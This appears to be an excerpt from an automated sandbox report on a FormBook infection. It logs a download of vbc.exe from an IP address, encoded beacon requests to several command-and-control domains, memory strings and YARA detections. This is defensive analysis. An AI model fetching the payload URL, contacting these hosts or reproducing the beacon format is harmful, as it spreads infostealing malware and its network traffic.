            Source: global trafficHTTP traffic detected: GET /1155/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.59Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jan 2022 19:23:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 26 Jul 2019 13:18:26 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jan 2022 19:23:11 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 14 Feb 2020 00:55:46 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 13 Jan 2022 19:23:17 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: explorer.exe, 00000006.00000000.501432004.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: explorer.exe, 00000006.00000000.494238454.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000006.00000000.509280979.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A5C04C.emfJump to behavior
            Source: unknownDNS traffic detected: queries for: www.orphe.biz
            Source: global trafficHTTP traffic detected: GET /1155/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.59Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1Host: www.orphe.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.circlessalaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1Host: www.ylhwcl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.terapiaholisticaemformacao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1Host: www.ecommerceoptimise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.integratedheartspsychology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1Host: www.bjbwx114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
